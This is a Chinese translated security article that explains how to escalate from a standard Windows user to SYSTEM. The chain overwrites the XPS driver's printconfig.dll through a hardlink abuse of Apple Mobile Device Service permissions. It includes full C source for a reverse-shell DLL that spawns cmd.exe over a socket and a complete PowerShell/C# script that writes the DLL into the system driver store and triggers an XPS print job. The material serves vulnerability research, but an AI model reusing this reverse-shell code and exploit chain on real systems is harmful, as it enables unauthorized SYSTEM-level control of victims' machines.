51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

通过任意文件覆盖漏洞直接获取系统操作的最高权限

作者:xiaohui
安全 漏洞
任意文件覆盖一直被视为关键漏洞,因为它可能导致权限升级。

任意文件覆盖一直被视为关键漏洞,因为它可能导致权限升级。在Windows系统中,这通常意味着模拟管理员或系统运行。

[[345613]]

如果标准用户能够通过某种“利用”来更改特殊受保护文件的权限(通过授予他修改甚至更好的完全控制权限),则他可以更改目标文件的内容,以便将恶意代码注入到服务可执行文件、脚本、dll等。

但是随着时间的推移,“利用后”攻击面受到限制,例如,系统文件受特殊的“受信任的安装程序”组保护,甚至系统/管理员也只能对其进行读取和执行访问。

不过最近,攻击者通过成功更改System32中“license.rtf”文件的权限之后,可能使用Forshaw的“ Diaghub Collector利用”,因为该文件不受受信任的安装程序的保护。

第三方软件始终是一个选项,因为通常它们不受“受信任的安装程序”的保护。攻击者应枚举所有已安装的软件和可执行文件,识别哪些运行在高语境(high context)中,以及如何配置它们。一个典型的例子是服务可执行文件,它以SYSTEM身份运行,并且可由标准用户启动。在我的惠普笔记本电脑上,我拥有满足所有要求的“惠普软件框架服务(HP Software Framework)”,HP Software Framework提供了一套通用的软件接口,可以集中并简化对硬件、BIOS 和 HP 设备驱动程序的访问。

另一个不错的选择是“ Dropbox Updater Service”,它以每小时一次的系统权限(在标准安装中)作为预定任务运行。

但是如果攻击者只想依靠标准的Windows操作系统软件呢?它变得越来越困难与微软补丁,但显然有一些可能性。例如,还记得“ALPC任务调度程序”漏洞吗?

最终结果是覆盖“ Printconfig.dll”,其中SYSTEM拥有完全控制权,启动XPS打印作业(将加载修改后的Printconfig.dll),并在SYSTEM用户上下文中执行代码。结果,它仍然可以使用。

接下来,我将向你展示如何使用相对简单的多合一Powershell脚本从printconfig.dll中“滥用”。

“Microsoft XPS Document Writer”是一种特殊的打印机驱动程序:“Microsoft XPS文档编写器(MXDW)是一种打印到文件的驱动程序,该驱动程序使Windows应用程序可以从带有Service Pack 2(SP2)的Windows XP开始的Windows版本上创建XML Paper Specification(XPS)文档文件。”

这个驱动程序位于不同的位置(在本例中为Win 2019服务器):

有趣的是第一个文件,因为它是最新的文件,并且与我们的体系结构(X64)相匹配。

因此,如果我们能够完全控制此文件,则可以使用修改后的dll覆盖该文件,启动XPS打印作业,该作业将加载dll并以SYSTEM用户身份执行代码(例如,反向shell)。

出于保密原因,我不会告诉你构建和编译DLL,而是向你展示代码的相关部分:

  1. #include "stdafx.h" 
  2. #include   
  3. #include #define _WINSOCK_DEPRECATED_NO_WARNINGS 
  4.   
  5. using namespace std; 
  6.   
  7. void Reverse() 
  9. WSADATA wsaData; 
  10. SOCKET s1; 
  11. struct sockaddr_in hax; 
  12.   
  13. STARTUPINFO sui; 
  14. PROCESS_INFORMATION pi; 
  15. launched = TRUE
  16. WSAStartup(MAKEWORD(2, 2), &wsaData); 
  17. s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL
  18. (unsigned int)NULL, (unsigned int)NULL); 
  19.   
  20. hax.sin_family = AF_INET; 
  21. hax.sin_port = htons(4444); 
  22. hax.sin_addr.s_addr = inet_addr("127.0.0.1"); 
  23.   
  24. WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULLNULLNULLNULL); 
  25.   
  26. memset(&sui, 0, sizeof(sui)); 
  27. sui.cb = sizeof(sui); 
  28. sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); 
  29. sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1; 
  30.   
  31. TCHAR commandLine[256] = L"cmd.exe"
  32. CreateProcess(NULL, commandLine, NULLNULLTRUE
  33.     0, NULLNULL, &sui, &pi); 
  35. extern "C" __declspec (dllexport) bool __cdecl DllMain(_In_ HINSTANCE hinstDLL, 
  36.     _In_ DWORD     fdwReason, 
  37.     _In_ LPVOID    lpvReserved 
  38.                      ) 
  40.   
  41.      
  42.     switch (fdwReason) 
  43.     { 
  44.     case DLL_PROCESS_ATTACH: 
  45.          
  46.         Reverse(); 
  47.          
  48.         break; 
  49.     case DLL_THREAD_ATTACH: 
  50.     case DLL_THREAD_DETACH: 
  51.     case DLL_PROCESS_DETACH: 
  52.         break; 
  53.     } 
  54.      
  55.      
  56.      
  57.        
  58.     return TRUE

加载库时总是调用DLLMain(),它将在本地主机端口4444上执行我们的反向shell。

我们只需要编译DLL并将其转换为b64中的二进制文件,因为我们会将其插入到ps1脚本中:

  1. $FilePath="c:\temp\my.dll" 
  2. $ByteArray = [System.IO.File]::ReadAllBytes($FilePath) 
  3. $Base64String = [System.Convert]::ToBase64String($ByteArray) 
  4. $Base64String | Set-Content -force "out.64" 

现在我们的脚本是“xps.ps1”,必须包含一些c#代码,因为它更容易调用和操作API函数:

  1. $mycode = @" 
  2. using System; 
  3. using System.ComponentModel; 
  4. using System.IO; 
  5. using System.Runtime.InteropServices; 
  6. namespace XPS 
  8. public class XpsPrint 
  10. public static void StartPrintJob() 
  12. PrintJob("Microsoft XPS Document Writer""myjob"); 
  14. public static void PrintJob(string printerName, string jobName) 
  16. IntPtr completionEvent = CreateEvent(IntPtr.Zero, truefalsenull); 
  17. if (completionEvent == IntPtr.Zero) 
  18. throw new Win32Exception(); 
  19. try 
  21. IXpsPrintJob job; 
  22. IXpsPrintJobStream jobStream; 
  23. StartJob(printerName, jobName, completionEvent, out job, out jobStream); 
  24. jobStream.Close(); 
  25.   
  26.   
  28. finally 
  30. if (completionEvent != IntPtr.Zero) 
  31. CloseHandle(completionEvent); 
  34. private static void StartJob(string printerName, string jobName, IntPtr completionEvent, out IXpsPrintJob job, out IXpsPrintJobStream jobStream) 
  36. int result = StartXpsPrintJob(printerName, jobName, null, IntPtr.Zero, completionEvent, 
  37. null, 0, out job, out jobStream, IntPtr.Zero); 
  38.   
  40. [DllImport("XpsPrint.dll", EntryPoint = "StartXpsPrintJob")] 
  41. private static extern int StartXpsPrintJob( 
  42. [MarshalAs(UnmanagedType.LPWStr)] String printerName, 
  43. [MarshalAs(UnmanagedType.LPWStr)] String jobName, 
  44. [MarshalAs(UnmanagedType.LPWStr)] String outputFileName, 
  45. IntPtr progressEvent,  
  46. IntPtr completionEvent,  
  47. [MarshalAs(UnmanagedType.LPArray)] byte[] printablePagesOn, 
  48. UInt32 printablePagesOnCount, 
  49. out IXpsPrintJob xpsPrintJob, 
  50. out IXpsPrintJobStream documentStream, 
  51. IntPtr printTicketStream);  
  52. [DllImport("Kernel32.dll", SetLastError = true)] 
  53. private static extern IntPtr CreateEvent(IntPtr lpEventAttributes, bool bManualReset, bool bInitialState, string lpName); 
  54. [DllImport("Kernel32.dll", SetLastError = true, ExactSpelling = true)] 
  55. private static extern WAIT_RESULT WaitForSingleObject(IntPtr handle, Int32 milliseconds); 
  56. [DllImport("Kernel32.dll", SetLastError = true)] 
  57. [return: MarshalAs(UnmanagedType.Bool)] 
  58. private static extern bool CloseHandle(IntPtr hObject); 
  60. [Guid("0C733A30-2A1C-11CE-ADE5-00AA0044773D")]  
  61. [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 
  62. interface IXpsPrintJobStream 
  64. void Read([MarshalAs(UnmanagedType.LPArray)] byte[] pv, uint cb, out uint pcbRead); 
  65. void Write([MarshalAs(UnmanagedType.LPArray)] byte[] pv, uint cb, out uint pcbWritten); 
  66. void Close(); 
  68. [Guid("5ab89b06-8194-425f-ab3b-d7a96e350161")] 
  69. [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 
  70. interface IXpsPrintJob 
  72. void Cancel(); 
  73. void GetJobStatus(out XPS_JOB_STATUS jobStatus); 
  75. [StructLayout(LayoutKind.Sequential)] 
  76. struct XPS_JOB_STATUS 
  78. public UInt32 jobId; 
  79. public Int32 currentDocument; 
  80. public Int32 currentPage; 
  81. public Int32 currentPageTotal; 
  82. public XPS_JOB_COMPLETION completion; 
  83. public Int32 jobStatus;  
  84. }; 
  85. enum XPS_JOB_COMPLETION 
  87. XPS_JOB_IN_PROGRESS = 0, 
  88. XPS_JOB_COMPLETED = 1, 
  89. XPS_JOB_CANCELLED = 2, 
  90. XPS_JOB_FAILED = 3 
  92. enum WAIT_RESULT 
  94. WAIT_OBJECT_0 = 0, 
  95. WAIT_ABANDONED = 0x80, 
  96. WAIT_TIMEOUT = 0x102, 
  97. WAIT_FAILED = -1  
  100.   
  101. "@ 
  102. ## Change this according to your system: 
  103. $dllb64="..." 
  104. $targetfile="C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_e4ff50d4d5f8b2aa\Amd64\printconfig.dll" 
  105. $PEBytes = [System.Convert]::FromBase64String($dllb64) 
  106. $PEBytes | Set-Content -force $targetfile -Encoding Byte 
  107. add-type -typeDefinition $mycode 
  108. [XPS.XpsPrint]::StartPrintJob() 
  109. echo "[+] done!" 
  110. exit 

在$ddlB64变量中,我们将分配之前保存在“out.64”中的dll的b64字符串。

现在,出于测试目的,以SYSTEM用户身份,只需更改“ printconfig.dll”的权限。请记住,要进行备份!

让我们继续:

是的,它绝对有效!通过以没有特殊权限的标准用户身份启动XPS打印作业,获得了SYSTEM用户的反向shell!

为了摆脱文件对话框,我们可以在StartJob()方法中指定一个文件名:

  1. private static void StartJob(string printerName, string jobName, IntPtr completionEvent, out IXpsPrintJob job, out IXpsPrintJobStream jobStream) 
  3. int result = StartXpsPrintJob(printerName, jobName, 
  4. "c:\\windows\\temp\\test.txt", IntPtr.Zero, completionEvent, 
  5. null, 0, out job, out jobStream, IntPtr.Zero); 
  6.   

但你猜怎么着?你将模拟“NT AUTHORITY\LOCAL SERVICE”!

在本例中,将调用允许后台打印XPS文件的驱动程序“printfilterpipelinesvc.exe”,并以“本地服务”帐户而非“系统”帐户运行该驱动程序!

但是攻击者怎么才能覆盖任意文件?

如上所述,我将通过一个真实的示例向你展示如何利用“Printconfig” dl。但是。这个iPhone有什么关系呢?

为此,我特意寻找了可以通过硬链接利用的特权文件操作。

通过努力,我们发现了目录c:\programdata\apple\lockdown。

iTunes软件安装的“苹果移动设备服务”使用此文件夹,该服务以“本地系统”特权运行,负责处理通过USB端口与苹果设备(iPhone,iPad等)的通信。

如下所示,标准用户可以在以下目录中添加文件:

每次插入新设备时,驱动程序都会以

现在,插入我们的苹果设备。将生成“配对证书”,并且在此文件上设置的权限如下:

如你所见,用户仅对此文件具有读取权限。

现在你会发现一个有趣的事情,如果你拔下设备的插头,然后再次插入,则会发生一些神奇的事情,从而授予用户对该文件的完全控制权限:

我们使用Sysinternals的“procmon”工具观察到这种有趣的行为:

SetSecurity调用是从提升的上下文(SYSTEM)发出的,它将授予用户对资源的完全控制权。所以这个会不会成为一个漏洞,被攻击者利用呢?

答案是肯定的,只需输入 “NATIVE HARDLINKS“即可。

标准的Windows用户不需要特殊的权限即可创建此类链接,我们可以使用Forshaw的实用程序来管理它们。

那么,为什么不在此文件上设置“本机硬链接(“native hardlink”)”,并让其指向只有SYSTEM才能完全控制的资源呢?

这是我们要做的,将我们的

现在,我们只需要插入我们的苹果设备即可更改目标文件的权限:

是的,它起作用了!

至此,我们已经完成了所有的工作,只需要将目标文件更改为printconfig.dll,然后用我们自己的dll覆盖它,开始XPS打印作业,最后享受SYSTEM shell。你可以观看POC的视频,链接请点击这

边界条件

1. 你需要在Windows计算机上具有用户shel程序访问权限;

2. iTunes和Apple Mobile Device Service应该一起安装,为此我们使用最新的iTunes版本(在撰写本文时为12.10.3)对其进行了测试。

3. 出于测试目的,你需要对计算机进行物理访问才能插入苹果设备,但这并不是必须的。因为你可以删除* .plist文件,创建指向目标dll的相同* .plist文件的硬链接,然后等待设备插件。我们观察到有时即使没有配对设备也会设置完全权限,但是我们需要对其进行更多研究。

注意

在Windows未来发布的版本在,通用硬链接滥用中将不再起作用。因为,在最新的“Insider”预览中,MS添加了一些补充检查,因此,如果你无权访问目标文件,则在尝试创建硬链接时会收到拒绝访问错误。

微软在每一个新系统正式发行之前,都会向开发者提供预览版系统,以便更快的找到 Bug 并解决。而 Windows Insider 的开放注册让更多的人加入到 Windows 10的改进和完善的工作中来,让Windows 更加适应消费者的需求。

本文翻译自:https://decoder.cloud/2019/11/13/from-arbitrary-file-overwrite-to-system/ https://decoder.cloud/2019/12/12/from-iphone-to-nt-authoritysystem/如若转载,请注明原文地址。

 

责任编辑:姜华 来源: 嘶吼网
漏洞
相关推荐
WordPress插件任意文件上传漏洞
WordPress插件CompleteGalleryManager3.3.3任意文件上传漏洞允许远程的攻击者通过HTTP的POST方式上传文件,这个文件的扩展名可以是任意格式的,CompleteGalleryManager这个插件中没有严密的过滤代码来限制这些未经授权的特殊后缀名文件上传到服务器上。

2013-10-31 13:19:06

Phpcms爆存在“任意文件读取”漏洞
近期phpcmsv9被发现一个任意文件读取漏洞,Phpcms是目前互联网上使用比较广泛的webcms。

2011-12-26 10:17:12

所有PEARMail函数包含任意文件读写漏洞
$from变量的过滤并不完全,由于escapeShellCmd会将\等字符替换为空,即可绕过对空格的检查,而escapeshellcmd本身并不检查对于参数的调用,所以导致安全漏洞的发生。

2009-07-06 17:34:20

PEARMail函数php
OS X 重大安全漏洞:可通过修改时钟获取系统最高权限
约半年前,苹果MacOSX中一个地址不明的安全漏洞被发现,恶意入侵者可通过修改用户的时钟,利用时间戳设置来绕开系统的常规授权验证方式,从而获得读取计算机所有文件的最高权限。该漏洞一直没有被修复,受影响的系统有OSX10.710.8.4,苹果目前并没有做出回应。

2013-08-29 15:24:36

揭秘Windows 7最高文件操作权限
提到Windows7的权限,有些朋友就很疑惑,明明自己是管理员权限,可是删除某些文件或文件夹,竟然提示权限不够,难道管理员权限不是最高的?是的,对于文件或文件夹来说,管理员权限并不是最高的。

2011-04-01 09:43:50

Windows 7权限
微软新漏洞:攻击者可获取Windows和Linux系统最高权限
7月20日,微软的Windows10和即将推出的Windows11版本被发现存在一个新的本地权限升级漏洞,低级权限的用户可以访问Windows系统文件,并且能够破解操作系统安装密码,甚至解密私钥。

2021-07-22 16:09:02

漏洞WindowsLinux
通过ElasticSearch漏洞获取某站webshell权限
ElasticSearch在一些大型企业内部往往部署的比较多,因此在获取某内网权限后,进一步的渗透就非常有意义了。在上一篇《ElasticSearch漏洞实战:通过perl进行反弹shell》中分析了通过perl脚本来获取反弹的shell,反弹的shell具有一定的时效性,本文就非perl方面的渗透进行探讨。

2015-03-09 10:22:23

浅谈Flex中直接获取某个组件对象
有这样一个需求:假如你new了一百次Button,同时这些button的id分别赋值如btn1.id"button1";btn2.id"button2";以此类推。当100个button建立后,我想直接对其第20个button进行操作,那么应该如何实现呢?本文将介绍如何在Flex直接获取某个组件的对象。

2009-07-14 14:37:11

Flex
Windows 10新bug可导致任意文件被覆写
一位安全研究人员在GitHub发布了Windows10中的一个0day漏洞概念验证代码。该漏洞由SandboxEscaper透露,他是一位之前就曾暴露过Windows漏洞的研究人员。

2019-01-02 09:16:27

海康威视安防监控录像机曝远程代码执行漏洞
知名监控产品供应商海康威视(Hikvision)的大量数码录像机设备被曝存在远程代码执行漏洞,黑客可以由此直接获取设备最高权限。

2014-11-28 15:29:52

获取Win8/8.1最高权限:System权限
为了避免XP系统时代用户管理员权限的滥用,保护window的安全和运行,微软把部分权限给了System系统的用户组来管理,而用户可以利用这个特点获取部分的System权限进行操作。

2013-10-24 11:03:07

Windows 8.1Windows 8System权限
海量数据,三行Python代码直接获取
说起数据分析,我们想到的往往是各种算法、思路,图表等等,但是正所谓巧妇难为无米之炊,没有数据,何谈分析。

2023-07-31 08:02:28

安全宝对Serv-U FTP 7.3零日漏洞分析
ServUFTPServer0day漏洞是一个ServU远程目录遍历漏洞,20111201公布。该漏洞最终可以导致远程目录遍历漏洞,可以覆盖、下载任意文件。

2011-12-13 11:08:00

Mac OS X 惊现漏洞 改时钟获系统最高权限
在半年前,苹果MacOSX中一个地址不明的安全漏洞被发现,恶意入侵者可通过修改用户的时钟,利用时间设置来绕开系统的常规授权验证方式,从而获得读取计算机所有文件的最高权限。据悉,OSX10.7至10.8.4版该安全漏洞已经存在了将近半年的时间。

2013-09-02 09:19:19

Unix操作系统文件权限
在Unix操作系统与Windows操作系统谁可以更改文件的权限这个问题,往往只要对这个文件具有写权限的人就可以这个文件的权限。

2010-04-16 17:49:28

Unix操作系统
ElasticSearch远程代码执行漏洞告警
ElasticSearch爆出严重安全漏洞(CVE20151427),该漏洞可造成远程代码执行,攻击者可直接获取系统权限,危害较大,请广大用户注意。

2015-03-06 15:31:01

McAfee漏洞允许攻击者获取Windows系统权限
McAfee已经修补了其代理组件中的两个高危漏洞,其中一个漏洞可以让攻击者以SYSTEM权限进行任意代码执行操作。

2022-02-16 11:51:16

McAfee漏洞Windows
Linux内核爆安全漏洞通过exploit获取root权限
最近Linux内核爆出了一个严重的安全漏洞,非root用户可以通过该漏洞的exploit获取root权限。这并不罕见,值得一提的是这个补丁看起来如此平常以至于我们绝大多数人都不会以为这是安全问题。

2013-07-11 09:51:15

比较Unix操作系统文件权限
我们在文章中会讲解到Unix操作系统在文件权限控制上,跟Windows操作系统上还是有比较大的差异。保证了Unix操作系统的文件控制要比Windows操作系统的文件控制安全的多。

2010-04-16 17:46:26

Unix操作系统
N-Able曝高危漏洞,能任意删除Windows系统文件
该漏洞被追踪为CVE202327470(CVSS评分:8.8),与TOCTOU竞争条件漏洞有关。

2023-09-18 23:28:44

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服